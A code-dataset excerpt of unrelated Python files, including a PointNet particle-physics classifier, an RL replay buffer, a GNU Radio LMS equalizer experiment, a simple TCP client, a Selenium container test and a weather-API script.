df\n\ntrain_0_0 = shop_item_cnt_sum(train_0)\ntrain_0_0.index = train_0_0['date_block_num_all']\ndel train_0_0['date_block_num_all']\ntrain_0_0['item_cnt_day'].plot()\n\n\n\n","sub_path":"sales/data_clean.py","file_name":"data_clean.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"266813051","text":"import numpy as np\nfrom array import array\nimport tensorflow as tf\nimport datetime\nimport tensorflow.keras as keras\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import *\n\ndef rotate_point_cloud(batch_data):\n \"\"\" Randomly rotate the point clouds to augument the dataset\n rotation is per shape based along up direction\n Input:\n BxNx3 array, original batch of point clouds\n Return:\n BxNx3 array, rotated batch of point clouds\n \"\"\"\n rotated_data = np.zeros(batch_data.shape, dtype=np.float32)\n for k in range(batch_data.shape[0]):\n rotation_angle = np.random.uniform() * 2 * np.pi\n cosval = np.cos(rotation_angle)\n sinval = np.sin(rotation_angle)\n rotation_matrix = np.array([[cosval, -sinval, 0, 0, 0],\n [sinval, cosval, 0, 0, 0],\n [0, 0, 1, 0, 0],\n [0, 0, 0, 1, 0],\n [0, 0, 0, 0, 1]])\n shape_pc = batch_data[k, ...]\n rotated_data[k, ...] = np.dot(shape_pc.reshape((-1, 5)),rotation_matrix)\n return rotated_data\n\n\nclass DataGenerator(tf.keras.utils.Sequence):\n #def __init__(self,data, batch_size=32, num_classes=None, data_form=\"pixel\",num_channel=None,num_point=2048,rotation=False,pix=90,target=0):\n def __init__(self,data,batch_size=32, num_classes=None, data_form=\"pixel\",channel=None,num_point=2048,rotation=False,pix=90,target=0,stride=[0],seed=123,**kwargs):\n np.random.seed(123)\n self.target=target\n self.stride=stride\n self.batch_size = batch_size\n self.num_classes = num_classes\n data_forms={\"pixel\":0,\"voxel\":1,\"point\":2}\n self.data_form=data_forms[data_form]\n num_channels=[4,2,5]\n self.default_channel=num_channels[self.data_form] \n #self.signal=sigchain\n #self.background=bakchain\n #self.data=[self.signal,self.background]\n self.data=data\n #self.bak_total_len=self.background.GetEntries()\n #self.sig_total_len=self.signal.GetEntries()\n self.total_len=[sample.GetEntries() for sample in data]\n if(not num_classes):\n num_classes=len(data)\n self.num_classes=num_classes\n if(not channel):\n channel=range(self.default_channel)\n self.channel=channel\n self.num_point=num_point\n self.pix=pix\n data_shapes={\"pixel\":(len(channel),pix,pix),\"voxel\":(len(channel),pix,pix,pix),\"point\":(num_point,len(channel))}\n self.data_shape=data_shapes[data_form]\n\n self.rotation=rotation\n self.on_epoch_end()\n\n def __len__(self):\n return int(sum(self.total_len) // self.batch_size)-1 # number of batches\n\n def __getitem__(self, index):\n #index = self.index[index * self.batch_size : (index + 1) * self.batch_size] # batch index list\n #batch = [self.indices[k] for k in index] indices[1] [1,2,3,4]\n X, y = self.__get_data(self.batch_size)\n return X, y\n\n def divide(self,num_slice=1,num_piece=0):\n self.total_len=[int(sample_len/num_slice) for sample_len in self.total_len]\n print(self.total_len)\n assert not 0 in self.total_len,\"Error : slice is bigger than sample\"\n self.index = np.arange(sum(self.total_len)) # data index list\n self.choice_p=[1.*sample_len/sum(self.total_len) for sample_len in self.total_len]\n self.begin=[num_piece*sample_len for sample_len in self.total_len]\n self.ent=[num_piece*sample_len for sample_len in 
self.total_len]\n        self.test=False\n    def on_epoch_end(self):\n        self.index = np.arange(sum(self.total_len)) # data index list\n        self.choice_p=[1.*sample_len/sum(self.total_len) for sample_len in self.total_len]\n        self.begin=[0]*self.num_classes\n        self.ent=[0]*self.num_classes\n        self.test=False\n        #if self.shuffle == True:\n        #    np.random.shuffle(self.index)\n    def GetEntry(self,pick,entry):\n        self.data[pick].GetEntry(entry)\n    def get_test(self, verbose=False):\n        self.test=True\n        Xout,Yout= self.__get_data(sum(self.total_len),verbose)\n        self.on_epoch_end()\n        return Xout, Yout\n\n    def __get_data(self, batch_size,verbose=False):\n        X=[]\n        Y=[]\n        pick=0\n        num_data=0\n        #now=datetime.datetime.now() \n        for i in range(batch_size):\n            if(verbose):print(i)\n            if(self.test==True):\n                if(pick==self.num_classes):\n                    break\n            else:\n                pick=np.random.choice(self.num_classes,p=self.choice_p) # 0 background 1 signal\n            num_data+=1\n            self.data[pick].GetEntry(self.ent[pick])\n            if(self.data_form==0):\n                X.append([array(\"f\",self.data[pick].image_ecor_s),array(\"f\",self.data[pick].image_ecor_c),array(\"i\",self.data[pick].image_n_s),array(\"i\",self.data[pick].image_n_c)])\n            if(self.data_form==1):\n                X.append([array(\"f\",self.data[pick].voxel_ecor_s),array(\"i\",self.data[pick].voxel_n_s)])\n            if(self.data_form==2):\n                points=[]#phi eta depth s c \n                point_len=len(self.data[pick].fiber_depth)\n                if(0):\n                    for j in range(self.num_point):\n                        if(j < point_len):\n                            # assumed per-fiber layout [phi, eta, depth, s, c]; only fiber_depth is visible in the original\n                            points.append([self.data[pick].fiber_phi[j], self.data[pick].fiber_eta[j], self.data[pick].fiber_depth[j], self.data[pick].fiber_ecor_s[j], self.data[pick].fiber_ecor_c[j]])\n                        else:\n                            points.append([0.0] * 5)\n                X.append(points)\n            Y.append(pick)\n            # assumed bookkeeping: step to the next entry, and in test mode move to the next class once a sample is exhausted\n            self.ent[pick] += 1\n            if(self.test==True and self.ent[pick] >= self.begin[pick] + self.total_len[pick]):\n                pick += 1\n        return np.asarray(X), np.asarray(Y)\n\ndef jitter_point_cloud(batch_data, sigma=0.01, clip=0.05):\n    \"\"\" Randomly jitter points. jittering is per point.\n        Input:\n          BxNxC array, original batch of point clouds\n        Return:\n          BxNxC array, jittered batch of point clouds\n    \"\"\"\n    B, N, C = batch_data.shape\n    assert(clip > 0)\n    jittered_data = np.clip(sigma * np.random.randn(B, N, C), -1 * clip, clip)\n    jittered_data += batch_data\n    return jittered_data\n\nclass OrthogonalRegularizer(keras.regularizers.Regularizer):\n    def __init__(self, num_features, l2reg=0.001):\n        self.num_features = num_features\n        self.l2reg = l2reg\n        self.eye = tf.eye(num_features)\n\n    def __call__(self, x):\n        x = tf.reshape(x, (-1, self.num_features, self.num_features))\n        xxt = tf.tensordot(x, x, axes=(2, 2))\n        xxt = tf.reshape(xxt, (-1, self.num_features, self.num_features))\n        return tf.reduce_sum(self.l2reg * tf.square(xxt - self.eye))\n\ndef tblock(g,channel,feat=64,loop=2,num_point=2048,activation=\"relu\"):\n    x=g\n    for i in range(loop):\n        x=Convolution1D(feat,1,activation=activation,data_format='channels_last')(x)\n        x=BatchNormalization()(x)\n    x=MaxPooling1D(pool_size=num_point,data_format='channels_last')(x)\n    for i in range(loop):\n        x=Dense(feat,activation=activation)(x)\n        x=BatchNormalization()(x)\n    bias=keras.initializers.Constant(np.eye(channel).flatten())\n    #reg = OrthogonalRegularizer(channel)\n    #x=Dense(channel*channel,kernel_initializer=\"zeros\",bias_initializer=bias,activity_regularizer=reg)(x)\n    x=Dense(channel*channel,kernel_initializer=\"zeros\",bias_initializer=bias)(x)\n    #x=Dense(channel*channel,weights=[np.zeros([feat,channel*channel]),np.eye(channel).flatten().astype(np.float32)])(x)\n    T=Reshape((channel,channel))(x)\n    return Dot(axes=(2, 1))([g, T])\n    #return mat_mul(g,T)\n\ndef pointmodel(num_point=2048,channel=4,num_classes=2,peak=0,stride=['label'],network=\"0\",add_var=0,trial=None,activation=\"relu\"):\n    \n    # define optimizer\n    \n    input_points = Input(shape=(num_point,channel ))#\n    if(network==\"opt\"):\n        numfeat=trial.suggest_categorical(\"num_feat\",[16,64,128])\n        chfeat=trial.suggest_categorical(\"ch_feat\",[8,16,64])\n        numloop=trial.suggest_categorical(\"num_loop\",[1,2,3])\n    m = BatchNormalization()(input_points)#\n    if(network==\"0\"):\n        numfeat=64\n        chfeat=16\n        numloop=1\n    if(network==\"1\"):\n        numfeat=128\n        chfeat=64\n        numloop=1\n    if(network==\"2\"):\n        numfeat=64\n        chfeat=16\n        numloop=2\n    
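# preset "3": 128-wide features with the single-pass transform blocks\n    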
if(network==\"3\"):\n numfeat=128\n chfeat=16\n numloop=1\n g=tblock(m,channel=channel,feat=numfeat,loop=numloop,num_point=num_point,activation=activation)\n g = Convolution1D(chfeat, 1, input_shape=(num_point, channel), activation=activation,data_format='channels_last')(g)#\n g = BatchNormalization()(g)#\n \n g=tblock(g,channel=chfeat,feat=numfeat,loop=numloop,num_point=num_point,activation=activation)\n \n #g = Convolution1D(512, 1, activation=activation,data_format='channels_last')(g)\n #g = BatchNormalization()(g)\n #global_feature = Flatten()(MaxPooling1D(pool_size=num_point,data_format='channels_last')(g))#if use maxpooling many features needed\n g = Convolution1D(numfeat, 1, activation=activation,data_format='channels_last')(g)\n g = BatchNormalization()(g)\n g = Convolution1D(2, 1, activation=activation,data_format='channels_first')(g)\n g = BatchNormalization()(g)\n global_feature = Flatten()(g)\n #g = Convolution1D(512, 1, activation=activation,data_format='channels_last')(g)\n #g = BatchNormalization()(g)\n \n # global_feature\n \n # point_net_cls\n #c = Dense(256, activation=activation)(global_feature)#\n #c = BatchNormalization()(c)#\n #c= Dropout(rate=0.7)(c)\n #c = Dense(256, activation=activation)(c)#2 validation increase\n #c = BatchNormalization()(c)#2 0.63\n #c= Dropout(rate=0.7)(c)\n #c = Dense(num_classes, activation='softmax',name=\"output1\")(c)#\n if(add_var>0):\n input_vars = Input(shape=(add_var))\n v=BatchNormalization()(input_vars)\n global_feature=Concatenate()([global_feature,v])\n\n #if(peak==0):\n # c = Dense(num_classes, activation='softmax',name=\"output0\")(global_feature)#\n c=[]\n #c = Dense(1, activation='linear',name=\"output1\")(global_feature)#\n for i in stride:\n if(i==\"label\" or i==0):\n c.append(Dense(num_classes, activation='softmax',name=\"output{}\".format(i))(global_feature))#\n else:\n c.append(Dense(1,activation='linear',name=\"output{}\".format(i))(global_feature))\n # --------------------------------------------------end of pointnet\n \n # print the model summary\n #model = Model(inputs=input_points, outputs=prediction)\n if(add_var>0):\n return Model(inputs=[input_points,input_vars], outputs=c)\n else:\n return Model(inputs=input_points, outputs=c)\n\ndef attentionmodel(num_point=2048,channel=4,num_classes=2,peak=0,stride=['label'],network=\"0\",add_var=0,trial=None,activation=\"relu\"):\n \n \n input_points = Input(shape=(num_point,channel ))#\n m = BatchNormalization()(input_points)#\n if(network==\"2\"):\n numfeat=64\n chfeat=16\n numloop=2\n g=tblock(m,channel=channel,feat=numfeat,loop=numloop,num_point=num_point,activation=activation)\n g = Convolution1D(chfeat, 1, input_shape=(num_point, channel), activation=activation,data_format='channels_last')(g)#\n g = BatchNormalization()(g)#\n \n g=tblock(g,channel=chfeat,feat=numfeat,loop=numloop,num_point=num_point,activation=activation)\n \n #g = Convolution1D(512, 1, activation=activation,data_format='channels_last')(g)\n #g = BatchNormalization()(g)\n #global_feature = Flatten()(MaxPooling1D(pool_size=num_point,data_format='channels_last')(g))#if use maxpooling many features needed\n g = Convolution1D(numfeat, 1, activation=activation,data_format='channels_last')(g)\n g = BatchNormalization()(g)\n g = Convolution1D(2, 1, activation=activation,data_format='channels_first')(g)\n g = BatchNormalization()(g)\n global_feature = Flatten()(g)\n #g = Convolution1D(512, 1, activation=activation,data_format='channels_last')(g)\n #g = BatchNormalization()(g)\n \n # global_feature\n \n # 
point_net_cls\n #c = Dense(256, activation=activation)(global_feature)#\n #c = BatchNormalization()(c)#\n #c= Dropout(rate=0.7)(c)\n #c = Dense(256, activation=activation)(c)#2 validation increase\n #c = BatchNormalization()(c)#2 0.63\n #c= Dropout(rate=0.7)(c)\n #c = Dense(num_classes, activation='softmax',name=\"output1\")(c)#\n if(add_var>0):\n input_vars = Input(shape=(add_var))\n v=BatchNormalization()(input_vars)\n global_feature=Concatenate()([global_feature,v])\n\n #if(peak==0):\n # c = Dense(num_classes, activation='softmax',name=\"output0\")(global_feature)#\n c=[]\n #c = Dense(1, activation='linear',name=\"output1\")(global_feature)#\n for i in stride:\n if(i==\"label\" or i==0):\n c.append(Dense(num_classes, activation='softmax',name=\"output{}\".format(i))(global_feature))#\n else:\n c.append(Dense(1,activation='linear',name=\"output{}\".format(i))(global_feature))\n # --------------------------------------------------end of pointnet\n \n # print the model summary\n #model = Model(inputs=input_points, outputs=prediction)\n if(add_var>0):\n return Model(inputs=[input_points,input_vars], outputs=c)\n else:\n return Model(inputs=input_points, outputs=c)\n\nif __name__== '__main__':\n #trainchain=[rt.TChain(\"event\"),rt.TChain(\"event\")]\n #for i in range(20):\n # trainchain[0].Add(\"/pad/yulee/geant4/tester/analysis/fast/uJet50GeV_fastsim_{}.root\".format(i))\n # trainchain[1].Add(\"/pad/yulee/geant4/tester/analysis/fast/gJet50GeV_fastsim_{}.root\".format(i))\n #a=DataGenerator(trainchain,data_form=\"point\",batch_size=512)\n #b=a.__getitem__(10)\n #b=a.__getitem__(10)\n #b=a.__getitem__(10)\n path=[\"/pad/yulee/geant4/tester/analysis/fast/uJet50GeV_fastsim_{}.root\",\"/pad/yulee/geant4/tester/analysis/fast/gJet50GeV_fastsim_{}.root\"]\n #np.savez(\"point.npz\",x=x,y=y)\n #print(x.shape,y.shape)\n #print(test.__len__())\n #for i in range(test.__len__()):\n # x,y=test.__getitem__(0)\n","sub_path":"driter.py","file_name":"driter.py","file_ext":"py","file_size_in_byte":17255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"438365160","text":"sayur = ['bayam', 'kangkung', 'wortel', 'selada']\nprint(sayur)\nlagi = 'y'\nwhile lagi == 'y':\n print('Menu : \\nA. Tambah data sayur \\nB. Hapus data sayur \\nC. Tampilkan data sayur')\n pilihan = input('Pilihan Anda : ')\n\n if pilihan == 'A':\n data = input('Masukkan nama sayur yang mau ditambahkan : ')\n sayur.append(data)\n print(data +' berhasil ditambahkan.')\n lagi = input('Ingin kembali ke menu? (y/n): ')\n elif pilihan == 'B':\n data = str(input('Ketikkan nama sayur yang mau dihapus :'))\n try :\n sayur.remove(data)\n print('Sayur berhasil dihapus.')\n except ValueError:\n print('Nama sayur tidak ditemukan.')\n lagi = input('Ingin kembali ke menu? (y/n): ')\n elif pilihan == 'C':\n print('Data Sayur : ', sayur)\n lagi = input('Ingin kembali ke menu? (y/n): ')\n\nprint('Terima Kasih telah menggunakan layanan program ini. \\nSampai Jumpa Lagi!')\n","sub_path":"prak8/project 8-4.py","file_name":"project 8-4.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643198491","text":"#####################################################################\n# A script that demonstrates the implementation experience replay.\n# author: Utkarsh A. 
Mishra (utkarsh75477@gmail.com)\n#####################################################################\n\nfrom collections import deque\nimport random\nimport numpy as np\n\nclass ReplayBuffer(object):\n\n def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)\n\n def add(self, state, action, reward, next_state):\n experience = (state, action, reward, next_state)\n if self.count < self.buffer_size: \n self.buffer.append(experience)\n self.count += 1\n else:\n self.buffer.popleft()\n self.buffer.append(experience)\n\n def size(self):\n return self.count\n\n def sample_batch(self, batch_size):\n batch = []\n\n if self.count < batch_size:\n batch = random.sample(self.buffer, self.count)\n else:\n batch = random.sample(self.buffer, batch_size)\n\n state_batch = np.array([_[0] for _ in batch])\n action_batch = np.array([_[1] for _ in batch])\n reward_batch = np.array([_[2] for _ in batch])\n next_state_batch = np.array([_[3] for _ in batch])\n\n return state_batch, action_batch, reward_batch, next_state_batch\n\n def clear(self):\n self.buffer.clear()\n self.count = 0\n","sub_path":"mbbl/selfsupervision/replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"201241970","text":"import numpy as np\nimport os\nfrom numpy.random import randint\n\n## IndustrialConsumer\n\nclass IndustrialConsumer :\n\n def __init__(self,demand,cost_elec_market):\n self.dt = 0.5\n self.demand = demand\n self.cost_elec_market = cost_elec_market\n self.efficiency = 0.95\n self.battery_max_power = 10\n self.battery_capacity = 100\n self.battery_load = np.zeros(48)\n self.battery = np.zeros(48)\n self.electricity_purchases = np.zeros(48)\n self.load_profile = np.zeros(48)\n self.bill = np.zeros(48)\n self.battery[-1] = 50\n\n#Choice of the quantity of electricity from your battery you want to use to fulfill the demand over the time span [t,t+dt]\n def set_battery_load(self,t,battery_load):\n\n #If the battery isn't full enough to provide such amount of electricity, the latter is set to the maximum amount the battery can provide.\n if ((battery_load/self.efficiency) > self.battery[int((t-1)*2)]):\n print(\"Battery_shortage, battery load set to \",self.efficiency*self.battery[int((t-1)*2)])\n battery_load = self.efficiency*self.battery[int((t-1)*2)]\n\n #If the battery isn't enough powerful, the battery load is set to the battery maximum power.\n if (battery_load > self.battery_max_power):\n print(\"Insufficient battery power, battery load set to battery max power = \",self.battery_max_power)\n battery_load = self.battery_max_power\n\n #If all rules are respected, the amount of electricity from the battery used to meet the demand and the battery level are updated.\n self.battery_load[int(t*2)] = -battery_load\n self.battery[int(t*2)] = self.battery[int((t-1)*2)] - battery_load\n return(True)\n\n\n#Choice of the quantity of electricity you want to buy at time t (a part of the energy is lost because of a non-perfect battery efficiency\n def buy_electricity(self,t,Quantity):\n\n #If the player doesn't buy enough electricity to meet the demand, just enough electricity to do so is purchased.\n if ((Quantity - self.battery_load[int(t*2)]) < self.demand[int(t*2)]):\n print(\"You don't meet the demand, quantity set so that you do : Q = \",self.demand[int(t*2)] + self.battery_load[int(t*2)])\n 
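# raise the purchase just enough to cover the demand left after the battery's contribution\n            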
Quantity = self.demand[int(t*2)] + self.battery_load[int(t*2)]\n\n #If the amount of electricity purchased outgrows the maximum battery capacity, enough electricity to fill up the battery is purchased.\n if ((Quantity - self.demand[int(t*2)])*self.efficiency + self.battery[int(t*2)] > self.battery_capacity):\n print(\"Batterie insuffisante, quantity set to fully fill up your battery : Quantity = \",(self.battery_capacity - self.battery[int(t*2)])/self.efficiency + self.demand[int(t*2)])\n Quantity = (self.battery_capacity - self.battery[int(t*2)])/self.efficiency + self.demand[int(t*2)]\n\n #Update of the battery level and of the electricity purchases.\n self.battery[int(t*2)] += (Quantity - self.demand[int(t*2)])*self.efficiency\n self.electricity_purchases[int(t*2)] = Quantity\n return(True)\n\n#Compute the total load over the time span [t,t+dt].\n def compute_load(self,t):\n self.load_profile[int(t*2)] = self.battery_load[int(t*2)] + self.demand[int(t*2)]\n\n#Compute the current bill.\n # def update_bill(self,t):\n # self.bill[int(t*2)] = self.cost_elec_market[int(t*2)]*self.electricity_purchases[int(t*2)]\n\n\n\n\n\n\n\n\n\n","sub_path":"players/IC.py","file_name":"IC.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"83285011","text":"import os, shutil\nimport csv\nimport random\nfrom collections import namedtuple, deque\n\nimport numpy as np\nimport torch\n\nTransition = namedtuple('Transition', ('state', 'next_state', 'action', 'reward', 'mask'))\n\n\nclass Memory(object):\n def __init__(self, capacity, memory_dir, n_states):\n # self.memory = deque(maxlen=capacity)\n self.capacity = capacity\n self.memory_dir = memory_dir\n self.n_states = n_states\n if os.path.exists(self.memory_dir):\n shutil.rmtree(self.memory_dir)\n os.mkdir(self.memory_dir)\n self.count = 0\n\n def push(self, state, next_state, action, reward, mask):\n ### dequeの機能にappendなのでオーバーしたら最初のほうから消えていく\n # self.memory.append(Transition(state, next_state, action, reward, mask))\n state = self._tensor_to_csv(state)\n next_state = self._tensor_to_csv(next_state)\n action = self._np_to_csv(action)\n reward = str(reward)\n mask = str(mask)\n txt = state + \",next_state,\" + next_state + \",action,\" + action + \",reward,\" + reward + \",mask,\" + mask\n with open(self.memory_dir + \"{0:04d}.csv\".format(self.count), 'w') as f:\n writer = csv.writer(f)\n writer.writerow(txt.split(\",\"))\n self.count += 1\n if self.count >= self.capacity:\n self.count = 0\n\n def _tensor_to_csv(self, tensor):\n tensor = tensor.detach().numpy().reshape((-1)).tolist()\n tensor = [str(x) for x in tensor]\n tensor = \",\".join(tensor)\n return tensor\n\n def _np_to_csv(self, array):\n array = array.reshape((-1)).tolist()\n array = [str(x) for x in array]\n array = \",\".join(array)\n return array\n\n def sample(self, batch_size):\n # transitions = random.sample(self.memory, batch_size)\n # batch = Transition(*zip(*transitions))\n rand_list = np.random.randint(0, self.capacity, [batch_size])\n\n batch = {}\n state_list = np.zeros((batch_size, self.n_states))\n next_state_list = np.zeros((batch_size, self.n_states))\n action_list = np.zeros((batch_size, 2))\n reward_list = np.zeros((batch_size, 1))\n mask_list = np.zeros((batch_size, 1))\n\n for i, rand in enumerate(rand_list):\n with open(self.memory_dir + \"{0:04d}.csv\".format(rand)) as f:\n txt = f.read()\n state, txt = txt.split(\",next_state,\")\n next_state, txt = txt.split(\",action,\")\n 
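# peel each field off using the delimiters written by push()\n                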
action, txt = txt.split(\",reward,\")\n                reward, mask = txt.split(\",mask,\")\n                state = state.split(\",\")\n                next_state = next_state.split(\",\")\n                action = action.split(\",\")\n                reward = reward.split(\",\")\n                mask = mask.split(\",\")\n                state_list[i] = np.asarray(state)\n                next_state_list[i] = np.asarray(next_state)\n                action_list[i] = np.asarray(action)\n                reward_list[i] = np.asarray(reward)\n                mask_list[i] = np.asarray(mask)\n        batch[\"state\"] = torch.from_numpy(state_list.astype(np.float32))\n        batch[\"next_state\"] = torch.from_numpy(next_state_list.astype(np.float32))\n        batch[\"action\"] = torch.from_numpy(action_list.astype(np.float32))\n        batch[\"reward\"] = torch.from_numpy(reward_list.astype(np.float32).reshape((-1)))\n        batch[\"mask\"] = torch.from_numpy(mask_list.astype(np.float32).reshape((-1)))\n\n        return batch\n\n    def __len__(self):\n        # the in-memory deque was replaced by on-disk transition files, so count those\n        return len(os.listdir(self.memory_dir))\n","sub_path":"04_cartpole_img_pca/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"262830141","text":"# -*- coding:utf-8 -*-\n\nfrom socket import *\n\nserver_info = ('20.20.20.82', 8080)\n\n\ndef main():\n    s = socket()\n    s.connect(server_info)\n    s.send('hello'.encode('utf-8'))\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"网络编程/011-tcp客户端.py","file_name":"011-tcp客户端.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"266552484","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \n# Copyright 2017 <+YOU OR YOUR COMPANY+>.\n# \n# This is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3, or (at your option)\n# any later version.\n# \n# This software is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this software; see the file COPYING. 
If not, write to\n# the Free Software Foundation, Inc., 51 Franklin Street,\n# Boston, MA 02110-1301, USA.\n# \nfrom gnuradio import analog\nfrom gnuradio import blocks\nfrom gnuradio import channels\nfrom gnuradio import digital\nfrom gnuradio import filter\nfrom gnuradio import gr\nfrom gnuradio.filter import firdes\nimport numpy\n\n\nclass lms_nonlinear_experiment(gr.top_block):\n def __init__(self,\n snr_db=10,\n num_symbols=1024,\n taps=[]):\n gr.top_block.__init__(self, \"LMS Nonlinear Experiment\")\n\n ##################################################\n # Variables\n ##################################################\n self.snr_db = snr_db\n self.samp_rate = samp_rate = 1000000\n self.num_symbols = num_symbols\n self.taps = taps\n\n self.const = const = digital.constellation_8psk().base()\n\n\n ##################################################\n # Blocks\n ##################################################\n #self.interp_fir_filter_xxx_0_0 = filter.interp_fir_filter_ccc(2, (firdes.low_pass_2(1, 1, .25, .1, 80)))\n #self.interp_fir_filter_xxx_0_0.declare_sample_delay(0)\n self.digital_lms_equalizer_cc_0 = digital.lms_dd_equalizer_cc(4, .01, 2, self.const)\n self.digital_chunks_to_symbols_xx_1 = digital.chunks_to_symbols_bc((const.points()), 1)\n self.blocks_vector_sink_x_0 = blocks.vector_sink_c(1)\n self.blocks_head_0 = blocks.head(gr.sizeof_gr_complex*1, num_symbols)\n self.analog_random_source_x_1 = blocks.vector_source_b(map(int, numpy.random.randint(0, const.arity(), 1000)), True)\n self.blocks_repeat_0 = blocks.repeat(gr.sizeof_gr_complex * 1, 2)\n #self.interp_fir_filter_xxx_1 = filter.interp_fir_filter_ccc(1, (\n #self.taps[0]/ numpy.sqrt((numpy.abs(self.taps[0]) ** 2 + numpy.abs(self.taps[1]) ** 2)),\n #self.taps[1]/ numpy.sqrt((numpy.abs(self.taps[0]) ** 2 + numpy.abs(self.taps[1]) ** 2))))\n self.interp_fir_filter_xxx_1 = filter.interp_fir_filter_ccc(1, self.taps)\n self.blocks_multiply_xx_0 = blocks.multiply_vcc(1)\n self.blocks_add_xx_0 = blocks.add_vcc(1)\n self.analog_const_source_x_0 = analog.sig_source_c(0, analog.GR_CONST_WAVE, 0, 0, .1)\n self.analog_noise_source_x_1 = analog.noise_source_c(analog.GR_GAUSSIAN, 10 ** (-20 / 20) / numpy.sqrt(2), 50)\n ##################################################\n # Connections\n ##################################################\n self.connect((self.analog_random_source_x_1, 0), (self.digital_chunks_to_symbols_xx_1, 0))\n self.connect((self.blocks_head_0, 0), (self.blocks_vector_sink_x_0, 0))\n\n #self.connect((self.digital_chunks_to_symbols_xx_1, 0), (self.interp_fir_filter_xxx_0_0, 0))\n self.connect((self.blocks_add_xx_0, 0), (self.digital_lms_equalizer_cc_0, 0))\n self.connect((self.digital_lms_equalizer_cc_0, 0), (self.blocks_head_0, 0))\n #self.connect((self.interp_fir_filter_xxx_0_0, 0), (self.channels_channel_model_0, 0))\n self.connect((self.blocks_repeat_0, 0), (self.interp_fir_filter_xxx_1, 0))\n self.connect((self.digital_chunks_to_symbols_xx_1, 0), (self.blocks_repeat_0, 0))\n\n\n\n\n self.connect((self.interp_fir_filter_xxx_1, 0), (self.blocks_add_xx_0, 1))\n self.connect((self.analog_noise_source_x_1, 0), (self.blocks_add_xx_0, 0))\n self.connect((self.blocks_multiply_xx_0, 0), (self.blocks_add_xx_0, 2))\n self.connect((self.interp_fir_filter_xxx_1, 0), (self.blocks_multiply_xx_0, 0))\n self.connect((self.interp_fir_filter_xxx_1, 0), (self.blocks_multiply_xx_0, 1))\n self.connect((self.analog_const_source_x_0, 0), (self.blocks_multiply_xx_0, 2))\n\n def get_snr_db(self):\n return self.snr_db\n\n def 
set_snr_db(self, snr_db):\n        self.snr_db = snr_db\n        # the channel model block is commented out above, so adjust the noise source's amplitude directly\n        self.analog_noise_source_x_1.set_amplitude(10**(-self.snr_db/20.0)/numpy.sqrt(2))\n\n    def get_samp_rate(self):\n        return self.samp_rate\n\n    def set_samp_rate(self, samp_rate):\n        self.samp_rate = samp_rate\n\n    def get_num_symbols(self):\n        return self.num_symbols\n\n    def set_num_symbols(self, num_symbols):\n        self.num_symbols = num_symbols\n        self.blocks_head_0.set_length(self.num_symbols)\n\n    def get_const(self):\n        return self.const\n\n    def set_const(self, const):\n        self.const = const\n","sub_path":"python/lms_nonlinear_experiment.py","file_name":"lms_nonlinear_experiment.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"445373614","text":"import pytest\nfrom selenium.webdriver import DesiredCapabilities\nfrom testcontainers.selenium import BrowserWebDriverContainer\n\n\n@pytest.mark.parametrize(\"caps\", [DesiredCapabilities.CHROME, DesiredCapabilities.FIREFOX])\ndef test_webdriver_container_container(caps):\n    chrome = BrowserWebDriverContainer(caps)\n\n    with chrome:\n        webdriver = chrome.get_driver()\n        webdriver.get(\"http://google.com\")\n        webdriver.find_element_by_name(\"q\").send_keys(\"Hello\")\n","sub_path":"tests/test_webdriver_container.py","file_name":"test_webdriver_container.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"239743886","text":"# weather.py\n# written by Jan-Niklas Dihlmann\n# IP location https://ipapi.co/\n# Powered by Dark Sky https://darksky.net/poweredby/\n\nimport json\nimport math\nimport requests\nimport datetime\n\n\nclass Weather(object):\n\n\tdef __init__(self, language, units, key, position):\n\t\tself.key = key\n\t\tself.units = units\n\t\tself.language = language\n\t\tself.position = position\n\t\tself.update()\n\n\tdef update(self):\n\t\tif self.position == None:\n\t\t\tself.set_position()\n\t\t\tif self.position != None:\n\t\t\t\tself.set_weather()\n\t\telse:\n\t\t\tself.set_weather()\n\n\tdef set_position(self):\n\t\ttry:\n\t\t\turl = 'https://ipapi.co/json/'\n\t\t\tresponse = requests.get(url)\n\t\t\tdata = json.loads(response.text)\n\t\t\tself.position = [data['latitude'], data['longitude']]\n\t\texcept Exception:\n\t\t\tself.exception()\n\n\tdef set_weather(self):\n\t\ttry:\n\t\t\turl = 'https://api.darksky.net/forecast/%s/%f,%f' % (self.key, self.position[0], self.position[1])\n\t\t\tparameter = {'lang': self.language, 'units': self.units, 'exclude': ['minutely','daily','alerts']}\n\t\t\tresponse = requests.get(url, params=parameter)\n\t\t\tdata = json.loads(response.text)\n\t\t\thourly = data['hourly']\n\t\t\tcurrently = data['currently']\n\t\t\tself.summary = hourly['summary']\n\t\t\tself.temperature = str(round(currently['temperature'])) + '°'\n\t\texcept Exception:\n\t\t\tself.exception()\n\n\tdef exception(self):\n\t\tdate = 